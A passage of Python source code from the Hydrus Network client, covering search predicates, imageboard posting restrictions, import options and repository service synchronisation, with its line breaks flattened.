'min_height' ] = int( height * 0.85 ) self._common_info[ 'max_height' ] = int( height * 1.15 ) if predicate_type == HC.PREDICATE_TYPE_SYSTEM_NUM_WORDS: ( operator, num_words ) = value if operator == '<': self._common_info[ 'max_num_words' ] = num_words elif operator == '>': self._common_info[ 'min_num_words' ] = num_words elif operator == '=': self._common_info[ 'num_words' ] = num_words elif operator == u'\u2248': if num_words == 0: self._common_info[ 'num_words' ] = 0 else: self._common_info[ 'min_num_words' ] = int( num_words * 0.85 ) self._common_info[ 'max_num_words' ] = int( num_words * 1.15 ) if predicate_type == HC.PREDICATE_TYPE_SYSTEM_LIMIT: limit = value self._limit = limit if predicate_type == HC.PREDICATE_TYPE_SYSTEM_FILE_SERVICE: ( operator, current_or_pending, service_key ) = value if operator == True: if current_or_pending == HC.CURRENT: self._file_services_to_include_current.append( service_key ) else: self._file_services_to_include_pending.append( service_key ) else: if current_or_pending == HC.CURRENT: self._file_services_to_exclude_current.append( service_key ) else: self._file_services_to_exclude_pending.append( service_key ) if predicate_type == HC.PREDICATE_TYPE_SYSTEM_SIMILAR_TO: ( hash, max_hamming ) = value self._similar_to = ( hash, max_hamming ) def GetFileServiceInfo( self ): return ( self._file_services_to_include_current, self._file_services_to_include_pending, self._file_services_to_exclude_current, self._file_services_to_exclude_pending ) def GetSimpleInfo( self ): return self._common_info def GetLimit( self ): return self._limit def GetRatingsPredicates( self ): return self._ratings_predicates def GetSimilarTo( self ): return self._similar_to def HasSimilarTo( self ): return self._similar_to is not None def MustBeArchive( self ): return self._archive def MustBeInbox( self ): return self._inbox def MustBeLocal( self ): return self._local def MustNotBeLocal( self ): return self._not_local class Imageboard( HydrusData.HydrusYAMLBase ): yaml_tag = u'!Imageboard' def __init__( self, name, post_url, flood_time, form_fields, restrictions ): self._name = name self._post_url = post_url self._flood_time = flood_time self._form_fields = form_fields self._restrictions = restrictions def IsOkToPost( self, media_result ): ( hash, inbox, size, mime, timestamp, width, height, duration, num_frames, num_words, tags_manager, locations_manager, local_ratings, remote_ratings ) = media_result.ToTuple() if CC.RESTRICTION_MIN_RESOLUTION in self._restrictions: ( min_width, min_height ) = self._restrictions[ CC.RESTRICTION_MIN_RESOLUTION ] if width < min_width or height < min_height: return False if CC.RESTRICTION_MAX_RESOLUTION in self._restrictions: ( max_width, max_height ) = self._restrictions[ CC.RESTRICTION_MAX_RESOLUTION ] if width > max_width or height > max_height: return False if CC.RESTRICTION_MAX_FILE_SIZE in self._restrictions and size > self._restrictions[ CC.RESTRICTION_MAX_FILE_SIZE ]: return False if CC.RESTRICTION_ALLOWED_MIMES in self._restrictions and mime not in self._restrictions[ CC.RESTRICTION_ALLOWED_MIMES ]: return False return True def GetBoardInfo( self ): return ( self._post_url, self._flood_time, self._form_fields, self._restrictions ) def GetName( self ): return self._name sqlite3.register_adapter( Imageboard, yaml.safe_dump ) class ImportFileOptions( HydrusSerialisable.SerialisableBase ): SERIALISABLE_TYPE = HydrusSerialisable.SERIALISABLE_TYPE_IMPORT_FILE_OPTIONS SERIALISABLE_VERSION = 1 def __init__( self, automatic_archive = None, exclude_deleted = None, min_size = None, min_resolution = None ): HydrusSerialisable.SerialisableBase.__init__( self ) self._automatic_archive = automatic_archive self._exclude_deleted = exclude_deleted self._min_size = min_size self._min_resolution = min_resolution def _GetSerialisableInfo( self ): return ( self._automatic_archive, self._exclude_deleted, self._min_size, self._min_resolution ) def _InitialiseFromSerialisableInfo( self, serialisable_info ): ( self._automatic_archive, self._exclude_deleted, self._min_size, self._min_resolution ) = serialisable_info def FileIsValid( self, size, resolution = None ): if self._min_size is not None and size < self._min_size: return False if resolution is not None and self._min_resolution is not None: ( x, y ) = resolution ( min_x, min_y ) = self._min_resolution if x < min_x or y < min_y: return False return True def GetAutomaticArchive( self ): return self._automatic_archive def GetExcludeDeleted( self ): return self._exclude_deleted def ToTuple( self ): return ( self._automatic_archive, self._exclude_deleted, self._min_size, self._min_resolution ) HydrusSerialisable.SERIALISABLE_TYPES_TO_OBJECT_TYPES[ HydrusSerialisable.SERIALISABLE_TYPE_IMPORT_FILE_OPTIONS ] = ImportFileOptions class ImportTagOptions( HydrusSerialisable.SerialisableBase ): SERIALISABLE_TYPE = HydrusSerialisable.SERIALISABLE_TYPE_IMPORT_TAG_OPTIONS SERIALISABLE_VERSION = 2 def __init__( self, service_keys_to_namespaces = None, service_keys_to_explicit_tags = None ): HydrusSerialisable.SerialisableBase.__init__( self ) if service_keys_to_namespaces is None: service_keys_to_namespaces = {} if service_keys_to_explicit_tags is None: service_keys_to_explicit_tags = {} self._service_keys_to_namespaces = service_keys_to_namespaces self._service_keys_to_explicit_tags = service_keys_to_explicit_tags def _GetSerialisableInfo( self ): safe_service_keys_to_namespaces = { service_key.encode( 'hex' ) : list( namespaces ) for ( service_key, namespaces ) in self._service_keys_to_namespaces.items() } safe_service_keys_to_explicit_tags = { service_key.encode( 'hex' ) : list( tags ) for ( service_key, tags ) in self._service_keys_to_explicit_tags.items() } return ( safe_service_keys_to_namespaces, safe_service_keys_to_explicit_tags ) def _InitialiseFromSerialisableInfo( self, serialisable_info ): ( safe_service_keys_to_namespaces, safe_service_keys_to_explicit_tags ) = serialisable_info self._service_keys_to_namespaces = { service_key.decode( 'hex' ) : set( namespaces ) for ( service_key, namespaces ) in safe_service_keys_to_namespaces.items() } self._service_keys_to_explicit_tags = { service_key.decode( 'hex' ) : set( tags ) for ( service_key, tags ) in safe_service_keys_to_explicit_tags.items() } def _UpdateSerialisableInfo( self, version, old_serialisable_info ): if version == 1: safe_service_keys_to_namespaces = old_serialisable_info safe_service_keys_to_explicit_tags = {} new_serialisable_info = ( safe_service_keys_to_namespaces, safe_service_keys_to_explicit_tags ) return ( 2, new_serialisable_info ) def GetServiceKeysToExplicitTags( self ): return dict( self._service_keys_to_explicit_tags ) def GetServiceKeysToNamespaces( self ): return dict( self._service_keys_to_namespaces ) def GetServiceKeysToContentUpdates( self, hash, tags ): tags = [ tag for tag in tags if tag is not None ] service_keys_to_tags = collections.defaultdict( set ) siblings_manager = HydrusGlobals.client_controller.GetManager( 'tag_siblings' ) parents_manager = HydrusGlobals.client_controller.GetManager( 'tag_parents' ) for ( service_key, namespaces ) in self._service_keys_to_namespaces.items(): tags_to_add_here = [] if len( namespaces ) > 0: for namespace in namespaces: if namespace == '': tags_to_add_here.extend( [ tag for tag in tags if not ':' in tag ] ) else: tags_to_add_here.extend( [ tag for tag in tags if tag.startswith( namespace + ':' ) ] ) tags_to_add_here = HydrusTags.CleanTags( tags_to_add_here ) if len( tags_to_add_here ) > 0: tags_to_add_here = siblings_manager.CollapseTags( tags_to_add_here ) tags_to_add_here = parents_manager.ExpandTags( service_key, tags_to_add_here ) service_keys_to_tags[ service_key ].update( tags_to_add_here ) for ( service_key, explicit_tags ) in self._service_keys_to_explicit_tags.items(): tags_to_add_here = HydrusTags.CleanTags( explicit_tags ) if len( tags_to_add_here ) > 0: tags_to_add_here = siblings_manager.CollapseTags( tags_to_add_here ) tags_to_add_here = parents_manager.ExpandTags( service_key, tags_to_add_here ) service_keys_to_tags[ service_key ].update( tags_to_add_here ) service_keys_to_content_updates = ConvertServiceKeysToTagsToServiceKeysToContentUpdates( { hash }, service_keys_to_tags ) return service_keys_to_content_updates def ShouldFetchTags( self ): i_am_interested_in_namespaces = len( self._service_keys_to_namespaces ) > 0 return i_am_interested_in_namespaces HydrusSerialisable.SERIALISABLE_TYPES_TO_OBJECT_TYPES[ HydrusSerialisable.SERIALISABLE_TYPE_IMPORT_TAG_OPTIONS ] = ImportTagOptions class Predicate( HydrusSerialisable.SerialisableBase ): SERIALISABLE_TYPE = HydrusSerialisable.SERIALISABLE_TYPE_PREDICATE SERIALISABLE_VERSION = 1 def __init__( self, predicate_type = None, value = None, inclusive = True, counts = None ): if counts is None: counts = {} if type( value ) == list: value = tuple( value ) self._predicate_type = predicate_type self._value = value self._inclusive = inclusive self._counts = {} self._counts[ HC.CURRENT ] = 0 self._counts[ HC.PENDING ] = 0 for ( current_or_pending, count ) in counts.items(): self.AddToCount( current_or_pending, count ) def __eq__( self, other ): return self.__hash__() == other.__hash__() def __hash__( self ): return ( self._predicate_type, self._value ).__hash__() def __ne__( self, other ): return self.__hash__() != other.__hash__() def __repr__( self ): return 'Predicate: ' + HydrusData.ToUnicode( ( self._predicate_type, self._value, self._counts ) ) def _GetSerialisableInfo( self ): if self._predicate_type in ( HC.PREDICATE_TYPE_SYSTEM_RATING, HC.PREDICATE_TYPE_SYSTEM_FILE_SERVICE ): ( operator, value, service_key ) = self._value serialisable_value = ( operator, value, service_key.encode( 'hex' ) ) elif self._predicate_type == HC.PREDICATE_TYPE_SYSTEM_SIMILAR_TO: ( hash, max_hamming ) = self._value serialisable_value = ( hash.encode( 'hex' ), max_hamming ) elif self._predicate_type == HC.PREDICATE_TYPE_SYSTEM_HASH: hash = self._value serialisable_value = hash.encode( 'hex' ) else: serialisable_value = self._value return ( self._predicate_type, serialisable_value, self._inclusive ) def _InitialiseFromSerialisableInfo( self, serialisable_info ): ( self._predicate_type, serialisable_value, self._inclusive ) = serialisable_info if self._predicate_type in ( HC.PREDICATE_TYPE_SYSTEM_RATING, HC.PREDICATE_TYPE_SYSTEM_FILE_SERVICE ): ( operator, value, service_key ) = serialisable_value self._value = ( operator, value, service_key.decode( 'hex' ) ) elif self._predicate_type == HC.PREDICATE_TYPE_SYSTEM_SIMILAR_TO: ( serialisable_hash, max_hamming ) = serialisable_value self._value = ( serialisable_hash.decode( 'hex' ), max_hamming ) elif self._predicate_type == HC.PREDICATE_TYPE_SYSTEM_HASH: self._value = serialisable_value.decode( 'hex' ) else: self._value = serialisable_value if type( self._value ) == list: self._value = tuple( self._value ) def AddToCount( self, current_or_pending, count ): self._counts[ current_or_pending ] += count def GetCopy( self ): return Predicate( self._predicate_type, self._value, self._inclusive, self._counts ) def GetCountlessCopy( self ): return Predicate( self._predicate_type, self._value, self._inclusive ) def GetCount( self, current_or_pending = None ): if current_or_pending is None: return sum( self._counts.values() ) else: return self._counts[ current_or_pending ] def GetInclusive( self ): # patch from an upgrade mess-up ~v144 if not hasattr( self, '_inclusive' ): if self._predicate_type not in HC.SYSTEM_PREDICATES: ( operator, value ) = self._value self._value = value self._inclusive = operator == '+' else: self._inclusive = True return self._inclusive def GetInfo( self ): return ( self._predicate_type, self._value, self._inclusive ) def GetType( self ): return self._predicate_type def GetUnicode( self, with_count = True ): count_text = u'' if with_count: if self._counts[ HC.CURRENT ] > 0: count_text += u' (' + HydrusData.ConvertIntToPrettyString( self._counts[ HC.CURRENT ] ) + u')' if self._counts[ HC.PENDING ] > 0: count_text += u' (+' + HydrusData.ConvertIntToPrettyString( self._counts[ HC.PENDING ] ) + u')' if self._predicate_type in HC.SYSTEM_PREDICATES: if self._predicate_type == HC.PREDICATE_TYPE_SYSTEM_EVERYTHING: base = u'system:everything' elif self._predicate_type == HC.PREDICATE_TYPE_SYSTEM_INBOX: base = u'system:inbox' elif self._predicate_type == HC.PREDICATE_TYPE_SYSTEM_ARCHIVE: base = u'system:archive' elif self._predicate_type == HC.PREDICATE_TYPE_SYSTEM_UNTAGGED: base = u'system:untagged' elif self._predicate_type == HC.PREDICATE_TYPE_SYSTEM_LOCAL: base = u'system:local' elif self._predicate_type == HC.PREDICATE_TYPE_SYSTEM_NOT_LOCAL: base = u'system:not local' elif self._predicate_type == HC.PREDICATE_TYPE_SYSTEM_DIMENSIONS: base = u'system:dimensions' elif self._predicate_type in ( HC.PREDICATE_TYPE_SYSTEM_NUM_TAGS, HC.PREDICATE_TYPE_SYSTEM_WIDTH, HC.PREDICATE_TYPE_SYSTEM_HEIGHT, HC.PREDICATE_TYPE_SYSTEM_DURATION, HC.PREDICATE_TYPE_SYSTEM_NUM_WORDS ): if self._predicate_type == HC.PREDICATE_TYPE_SYSTEM_NUM_TAGS: base = u'system:number of tags' elif self._predicate_type == HC.PREDICATE_TYPE_SYSTEM_WIDTH: base = u'system:width' elif self._predicate_type == HC.PREDICATE_TYPE_SYSTEM_HEIGHT: base = u'system:height' elif self._predicate_type == HC.PREDICATE_TYPE_SYSTEM_DURATION: base = u'system:duration' elif self._predicate_type == HC.PREDICATE_TYPE_SYSTEM_NUM_WORDS: base = u'system:number of words' if self._value is not None: ( operator, value ) = self._value base += u' ' + operator + u' ' + HydrusData.ConvertIntToPrettyString( value ) elif self._predicate_type == HC.PREDICATE_TYPE_SYSTEM_RATIO: base = u'system:ratio' if self._value is not None: ( operator, ratio_width, ratio_height ) = self._value base += u' ' + operator + u' ' + str( ratio_width ) + u':' + str( ratio_height ) elif self._predicate_type == HC.PREDICATE_TYPE_SYSTEM_SIZE: base = u'system:size' if self._value is not None: ( operator, size, unit ) = self._value base += u' ' + operator + u' ' + str( size ) + HydrusData.ConvertIntToUnit( unit ) elif self._predicate_type == HC.PREDICATE_TYPE_SYSTEM_LIMIT: base = u'system:limit' if self._value is not None: value = self._value base += u' is ' + HydrusData.ConvertIntToPrettyString( value ) elif self._predicate_type == HC.PREDICATE_TYPE_SYSTEM_AGE: base = u'system:age' if self._value is not None: ( operator, years, months, days, hours ) = self._value base += u' ' + operator + u' ' + str( years ) + u'y' + str( months ) + u'm' + str( days ) + u'd' + str( hours ) + u'h' elif self._predicate_type == HC.PREDICATE_TYPE_SYSTEM_NUM_PIXELS: base = u'system:num_pixels' if self._value is not None: ( operator, num_pixels, unit ) = self._value base += u' ' + operator + u' ' + str( num_pixels ) + ' ' + HydrusData.ConvertIntToPixels( unit ) elif self._predicate_type == HC.PREDICATE_TYPE_SYSTEM_HASH: base = u'system:hash' if self._value is not None: hash = self._value base += u' is ' + hash.encode( 'hex' ) elif self._predicate_type == HC.PREDICATE_TYPE_SYSTEM_MIME: base = u'system:mime' if self._value is not None: mimes = self._value if set( mimes ) == set( HC.SEARCHABLE_MIMES ): mime_text = 'anything' elif set( mimes ) == set( HC.SEARCHABLE_MIMES ).intersection( set( HC.APPLICATIONS ) ): mime_text = 'application' elif set( mimes ) == set( HC.SEARCHABLE_MIMES ).intersection( set( HC.AUDIO ) ): mime_text = 'audio' elif set( mimes ) == set( HC.SEARCHABLE_MIMES ).intersection( set( HC.IMAGES ) ): mime_text = 'image' elif set( mimes ) == set( HC.SEARCHABLE_MIMES ).intersection( set( HC.VIDEO ) ): mime_text = 'video' else: mime_text = ', '.join( [ HC.mime_string_lookup[ mime ] for mime in mimes ] ) base += u' is ' + mime_text elif self._predicate_type == HC.PREDICATE_TYPE_SYSTEM_RATING: base = u'system:rating' if self._value is not None: ( operator, value, service_key ) = self._value service = HydrusGlobals.client_controller.GetServicesManager().GetService( service_key ) base += u' for ' + service.GetName() + u' ' + operator + u' ' + HydrusData.ToUnicode( value ) elif self._predicate_type == HC.PREDICATE_TYPE_SYSTEM_SIMILAR_TO: base = u'system:similar to' if self._value is not None: ( hash, max_hamming ) = self._value base += u' ' + hash.encode( 'hex' ) + u' using max hamming of ' + str( max_hamming ) elif self._predicate_type == HC.PREDICATE_TYPE_SYSTEM_FILE_SERVICE: base = u'system:' if self._value is None: base += 'file service' else: ( operator, current_or_pending, service_key ) = self._value if operator == True: base += u'is' else: base += u'is not' if current_or_pending == HC.PENDING: base += u' pending to ' else: base += u' currently in ' service = HydrusGlobals.client_controller.GetServicesManager().GetService( service_key ) base += service.GetName() base += count_text elif self._predicate_type == HC.PREDICATE_TYPE_TAG: tag = self._value if not self._inclusive: base = u'-' else: base = u'' base += tag base += count_text siblings_manager = HydrusGlobals.client_controller.GetManager( 'tag_siblings' ) sibling = siblings_manager.GetSibling( tag ) if sibling is not None: base += u' (will display as ' + sibling + ')' elif self._predicate_type == HC.PREDICATE_TYPE_PARENT: base = ' ' tag = self._value base += tag base += count_text elif self._predicate_type == HC.PREDICATE_TYPE_NAMESPACE: namespace = self._value if not self._inclusive: base = u'-' else: base = u'' base += namespace + u':*anything*' elif self._predicate_type == HC.PREDICATE_TYPE_WILDCARD: wildcard = self._value if not self._inclusive: base = u'-' else: base = u'' base += wildcard return base def GetValue( self ): return self._value def SetInclusive( self, inclusive ): self._inclusive = inclusive HydrusSerialisable.SERIALISABLE_TYPES_TO_OBJECT_TYPES[ HydrusSerialisable.SERIALISABLE_TYPE_PREDICATE ] = Predicate class Service( HydrusData.HydrusYAMLBase ): yaml_tag = u'!Service' def __init__( self, service_key, service_type, name, info ): HydrusData.HydrusYAMLBase.__init__( self ) self._service_key = service_key self._service_type = service_type self._name = name self._info = info self._lock = threading.Lock() HydrusGlobals.client_controller.sub( self, 'ProcessServiceUpdates', 'service_updates_data' ) def __hash__( self ): return self._service_key.__hash__() def _RecordHydrusBandwidth( self, method, command, data_used ): if ( self._service_type, method, command ) in HC.BANDWIDTH_CONSUMING_REQUESTS: HydrusGlobals.client_controller.pub( 'service_updates_delayed', { self._service_key : [ HydrusData.ServiceUpdate( HC.SERVICE_UPDATE_REQUEST_MADE, data_used ) ] } ) def _ReportSyncProcessingError( self, path, error_text ): text = 'While synchronising ' + self._name + ', the expected update file ' + path + ', ' + error_text + '.' text += os.linesep * 2 text += 'The service has been indefinitely paused.' text += os.linesep * 2 text += 'This is a serious error. Unless you know what went wrong, you should contact the developer.' HydrusData.ShowText( text ) service_updates = [ HydrusData.ServiceUpdate( HC.SERVICE_UPDATE_PAUSE ) ] service_keys_to_service_updates = { self._service_key : service_updates } self.ProcessServiceUpdates( service_keys_to_service_updates ) HydrusGlobals.client_controller.Write( 'service_updates', service_keys_to_service_updates ) def CanDownload( self ): return self._info[ 'account' ].HasPermission( HC.GET_DATA ) and not self.HasRecentError() def CanDownloadUpdate( self ): update_due = HydrusData.TimeHasPassed( self._info[ 'next_download_timestamp' ] + HC.UPDATE_DURATION + 1800 ) return self.CanDownload() and update_due and not self.IsPaused() def CanProcessUpdate( self ): update_is_downloaded = self._info[ 'next_download_timestamp' ] > self._info[ 'next_processing_timestamp' ] it_is_time = HydrusData.TimeHasPassed( self._info[ 'next_processing_timestamp' ] + HC.UPDATE_DURATION + HC.options[ 'processing_phase' ] ) return update_is_downloaded and it_is_time and not self.IsPaused() def CanUpload( self ): return self._info[ 'account' ].HasPermission( HC.POST_DATA ) and not self.HasRecentError() def GetCredentials( self ): host = self._info[ 'host' ] port = self._info[ 'port' ] if 'access_key' in self._info: access_key = self._info[ 'access_key' ] else: access_key = None credentials = Credentials( host, port, access_key ) return credentials def GetInfo( self, key = None ): if key is None: return self._info else: return self._info[ key ] def GetServiceKey( self ): return self._service_key def GetName( self ): return self._name def GetRecentErrorPending( self ): if 'account' in self._info and self._info[ 'account' ].HasPermission( HC.GENERAL_ADMIN ): return HydrusData.ConvertTimestampToPrettyPending( self._info[ 'last_error' ] + 600 ) else: return HydrusData.ConvertTimestampToPrettyPending( self._info[ 'last_error' ] + 3600 * 4 ) def GetServiceType( self ): return self._service_type def GetTimestamps( self ): return ( self._info[ 'first_timestamp' ], self._info[ 'next_download_timestamp' ], self._info[ 'next_processing_timestamp' ] ) def GetUpdateStatus( self ): account = self._info[ 'account' ] now = HydrusData.GetNow() first_timestamp = self._info[ 'first_timestamp' ] next_download_timestamp = self._info[ 'next_download_timestamp' ] next_processing_timestamp = self._info[ 'next_processing_timestamp' ] if first_timestamp is None: num_updates = 0 num_updates_downloaded = 0 num_updates_processed = 0 else: num_updates = ( now - first_timestamp ) / HC.UPDATE_DURATION num_updates_downloaded = ( next_download_timestamp - first_timestamp ) / HC.UPDATE_DURATION num_updates_processed = max( 0, ( next_processing_timestamp - first_timestamp ) / HC.UPDATE_DURATION ) downloaded_text = 'downloaded ' + HydrusData.ConvertValueRangeToPrettyString( num_updates_downloaded, num_updates ) processed_text = 'processed ' + HydrusData.ConvertValueRangeToPrettyString( num_updates_processed, num_updates ) if self.IsPaused() or not self._info[ 'account' ].HasPermission( HC.GET_DATA ): status = 'updates on hold' else: if self.CanDownloadUpdate(): status = 'downloaded up to ' + HydrusData.ConvertTimestampToPrettySync( self._info[ 'next_download_timestamp' ] ) elif self.CanProcessUpdate(): status = 'processed up to ' + HydrusData.ConvertTimestampToPrettySync( self._info[ 'next_processing_timestamp' ] ) elif self.HasRecentError(): status = 'due to a previous error, update is delayed - next check ' + self.GetRecentErrorPending() else: if HydrusData.TimeHasPassed( self._info[ 'next_download_timestamp' ] + HC.UPDATE_DURATION ): status = 'next update will be downloaded soon' else: status = 'fully synchronised - next update ' + HydrusData.ConvertTimestampToPrettyPending( self._info[ 'next_download_timestamp' ] + HC.UPDATE_DURATION + 1800 ) return downloaded_text + ' - ' + processed_text + ' - ' + status def HasRecentError( self ): if 'account' in self._info and self._info[ 'account' ].HasPermission( HC.GENERAL_ADMIN ): return self._info[ 'last_error' ] + 900 > HydrusData.GetNow() else: return self._info[ 'last_error' ] + 3600 * 4 > HydrusData.GetNow() def IsInitialised( self ): if self._service_type == HC.SERVER_ADMIN: return 'access_key' in self._info else: return True def IsPaused( self ): return self._info[ 'paused' ] def ProcessServiceUpdates( self, service_keys_to_service_updates ): for ( service_key, service_updates ) in service_keys_to_service_updates.items(): for service_update in service_updates: if service_key == self._service_key: ( action, row ) = service_update.ToTuple() if action == HC.SERVICE_UPDATE_ERROR: self._info[ 'last_error' ] = HydrusData.GetNow() elif action == HC.SERVICE_UPDATE_RESET: self._info[ 'last_error' ] = 0 if 'next_processing_timestamp' in self._info: self._info[ 'next_processing_timestamp' ] = 0 elif action == HC.SERVICE_UPDATE_ACCOUNT: account = row self._info[ 'account' ] = account self._info[ 'last_error' ] = 0 elif action == HC.SERVICE_UPDATE_REQUEST_MADE: num_bytes = row if self._service_type == HC.LOCAL_BOORU: self._info[ 'used_monthly_data' ] += num_bytes self._info[ 'used_monthly_requests' ] += 1 else: self._info[ 'account' ].RequestMade( num_bytes ) elif action == HC.SERVICE_UPDATE_NEXT_DOWNLOAD_TIMESTAMP: next_download_timestamp = row if next_download_timestamp > self._info[ 'next_download_timestamp' ]: if self._info[ 'first_timestamp' ] is None: self._info[ 'first_timestamp' ] = next_download_timestamp self._info[ 'next_download_timestamp' ] = next_download_timestamp elif action == HC.SERVICE_UPDATE_NEXT_PROCESSING_TIMESTAMP: next_processing_timestamp = row if next_processing_timestamp > self._info[ 'next_processing_timestamp' ]: self._info[ 'next_processing_timestamp' ] = next_processing_timestamp elif action == HC.SERVICE_UPDATE_PAUSE: self._info[ 'paused' ] = True def Request( self, method, command, request_args = None, request_headers = None, report_hooks = None, temp_path = None, return_cookies = False ): if request_args is None: request_args = {} if request_headers is None: request_headers = {} if report_hooks is None: report_hooks = [] try: credentials = self.GetCredentials() if command in ( 'access_key', 'init', '' ): pass elif command in ( 'session_key', 'access_key_verification' ): ClientNetworking.AddHydrusCredentialsToHeaders( credentials, request_headers ) else: ClientNetworking.AddHydrusSessionKeyToHeaders( self._service_key, request_headers ) path = '/' + command if method == HC.GET: query = ClientNetworking.ConvertHydrusGETArgsToQuery( request_args ) body = '' elif method == HC.POST: query = '' if command == 'file': content_type = HC.APPLICATION_OCTET_STREAM body = request_args[ 'file' ] del request_args[ 'file' ] else: if isinstance( request_args, HydrusSerialisable.SerialisableDictionary ): content_type = HC.APPLICATION_JSON body = request_args.DumpToNetworkString() else: content_type = HC.APPLICATION_YAML body = yaml.safe_dump( request_args ) request_headers[ 'Content-Type' ] = HC.mime_string_lookup[ content_type ] if query != '': path_and_query = path + '?' + query else: path_and_query = path ( host, port ) = credentials.GetAddress() url = 'http://' + host + ':' + str( port ) + path_and_query ( response, size_of_response, response_headers, cookies ) = HydrusGlobals.client_controller.DoHTTP( method, url, request_headers, body, report_hooks = report_hooks, temp_path = temp_path, return_everything = True ) ClientNetworking.CheckHydrusVersion( self._service_key, self._service_type, response_headers ) if method == HC.GET: data_used = size_of_response elif method == HC.POST: data_used = len( body ) self._RecordHydrusBandwidth( method, command, data_used ) if return_cookies: return ( response, cookies ) else: return response except Exception as e: if not isinstance( e, HydrusExceptions.ServerBusyException ): if isinstance( e, HydrusExceptions.SessionException ): session_manager = HydrusGlobals.client_controller.GetManager( 'hydrus_sessions' ) session_manager.DeleteSessionKey( self._service_key ) HydrusGlobals.client_controller.Write( 'service_updates', { self._service_key : [ HydrusData.ServiceUpdate( HC.SERVICE_UPDATE_ERROR, HydrusData.ToUnicode( e ) ) ] } ) if isinstance( e, HydrusExceptions.PermissionException ): if 'account' in self._info: account_key = self._info[ 'account' ].GetAccountKey() unknown_account = HydrusData.GetUnknownAccount( account_key ) else: unknown_account = HydrusData.GetUnknownAccount() HydrusGlobals.client_controller.Write( 'service_updates', { self._service_key : [ HydrusData.ServiceUpdate( HC.SERVICE_UPDATE_ACCOUNT, unknown_account ) ] } ) raise def SetCredentials( self, credentials ): ( host, port ) = credentials.GetAddress() self._info[ 'host' ] = host self._info[ 'port' ] = port if credentials.HasAccessKey(): self._info[ 'access_key' ] = credentials.GetAccessKey() def Sync( self, only_when_idle = False, stop_time = None ): job_key = HydrusThreading.JobKey( pausable = False, cancellable = True ) ( i_paused, should_quit ) = job_key.WaitIfNeeded() if should_quit: return if self._info[ 'paused' ]: return if not self.CanDownloadUpdate() and not self.CanProcessUpdate(): return num_updates_downloaded = 0 num_updates_processed = 0 total_content_weight_processed = 0 try: options = HydrusGlobals.client_controller.GetOptions() HydrusGlobals.client_controller.pub( 'splash_set_title_text', self._name ) job_key.SetVariable( 'popup_title', 'repository synchronisation - ' + self._name ) HydrusGlobals.client_controller.pub( 'message', job_key ) try: while self.CanDownloadUpdate(): if only_when_idle: if not HydrusGlobals.client_controller.CurrentlyIdle(): break else: if stop_time is not None and HydrusData.TimeHasPassed( stop_time ): break if options[ 'pause_repo_sync' ]: break ( i_paused, should_quit ) = job_key.WaitIfNeeded() if should_quit: break if self._info[ 'first_timestamp' ] is None: gauge_range = None gauge_value = 0 update_index_string = 'initial update: ' else: gauge_range = ( ( HydrusData.GetNow() - self._info[ 'first_timestamp' ] ) / HC.UPDATE_DURATION ) + 1 gauge_value = ( ( self._info[ 'next_download_timestamp' ] - self._info[ 'first_timestamp' ] ) / HC.UPDATE_DURATION ) + 1 update_index_string = 'update ' + HydrusData.ConvertValueRangeToPrettyString( gauge_value, gauge_range ) + ': ' subupdate_index_string = 'service update: ' HydrusGlobals.client_controller.pub( 'splash_set_title_text', self._name + ' - ' + update_index_string + subupdate_index_string ) HydrusGlobals.client_controller.pub( 'splash_set_status_text', 'downloading' ) job_key.SetVariable( 'popup_text_1', update_index_string + subupdate_index_string + 'downloading and parsing' ) job_key.SetVariable( 'popup_gauge_1', ( gauge_value, gauge_range ) ) service_update_package = self.Request( HC.GET, 'service_update_package', { 'begin' : self._info[ 'next_download_timestamp' ] } ) begin = service_update_package.GetBegin() subindex_count = service_update_package.GetSubindexCount() for subindex in range( subindex_count ): path = ClientFiles.GetExpectedContentUpdatePackagePath( self._service_key, begin, subindex ) if os.path.exists( path ): info = os.lstat( path ) size = info[6] if size == 0: os.remove( path ) if not os.path.exists( path ): subupdate_index_string = 'content update ' + HydrusData.ConvertValueRangeToPrettyString( subindex + 1, subindex_count ) + ': ' HydrusGlobals.client_controller.pub( 'splash_set_title_text', self._name + ' - ' + update_index_string + subupdate_index_string ) job_key.SetVariable( 'popup_text_1', update_index_string + subupdate_index_string + 'downloading and parsing' ) content_update_package = self.Request( HC.GET, 'content_update_package', { 'begin' : begin, 'subindex' : subindex } ) obj_string = content_update_package.DumpToString() job_key.SetVariable( 'popup_text_1', update_index_string + subupdate_index_string + 'saving to disk' ) with open( path, 'wb' ) as f: f.write( obj_string ) job_key.SetVariable( 'popup_text_1', update_index_string + 'committing' ) path = ClientFiles.GetExpectedServiceUpdatePackagePath( self._service_key, begin ) obj_string = service_update_package.DumpToString() with open( path, 'wb' ) as f: f.write( obj_string ) service_updates = [ HydrusData.ServiceUpdate( HC.SERVICE_UPDATE_NEXT_DOWNLOAD_TIMESTAMP, service_update_package.GetNextBegin() ) ] service_keys_to_service_updates = { self._service_key : service_updates } self.ProcessServiceUpdates( service_keys_to_service_updates ) HydrusGlobals.client_controller.Write( 'service_updates', service_keys_to_service_updates ) HydrusGlobals.client_controller.WaitUntilPubSubsEmpty() num_updates_downloaded += 1 except Exception as e: if 'Could not connect' in str( e ): job_key.SetVariable( 'popup_text_1', 'Could not connect to service, will continue with processing.' ) time.sleep( 5 ) else: raise e while self.CanProcessUpdate(): if only_when_idle: if not HydrusGlobals.client_controller.CurrentlyIdle(): break else: if stop_time is not None and HydrusData.TimeHasPassed( stop_time ): break if options[ 'pause_repo_sync' ]: break ( i_paused, should_quit ) = job_key.WaitIfNeeded() if should_quit: break gauge_range = ( ( HydrusData.GetNow() - self._info[ 'first_timestamp' ] ) / HC.UPDATE_DURATION ) + 1 gauge_value = ( ( self._info[ 'next_processing_timestamp' ] - self._info[ 'first_timestamp' ] ) / HC.UPDATE_DURATION ) + 1 update_index_string = 'update ' + HydrusData.ConvertValueRangeToPrettyString( gauge_value, gauge_range ) + ': ' subupdate_index_string = 'service update: ' HydrusGlobals.client_controller.pub( 'splash_set_title_text', self._name + ' - ' + update_index_string + subupdate_index_string ) HydrusGlobals.client_controller.pub( 'splash_set_status_text', 'processing' ) job_key.SetVariable( 'popup_text_1', update_index_string + subupdate_index_string + 'loading from disk' ) job_key.SetVariable( 'popup_gauge_1', ( gauge_value, gauge_range ) ) path = ClientFiles.GetExpectedServiceUpdatePackagePath( self._service_key, self._info[ 'next_processing_timestamp' ] ) if not os.path.exists( path ): self._ReportSyncProcessingError( path, 'was missing' ) return with open( path, 'rb' ) as f: obj_string = f.read() try: service_update_package = HydrusSerialisable.CreateFromString( obj_string ) except: self._ReportSyncProcessingError( path, 'did not parse' ) return subindex_count = service_update_package.GetSubindexCount() processing_went_ok = True for subindex in range( subindex_count ): if only_when_idle: if not 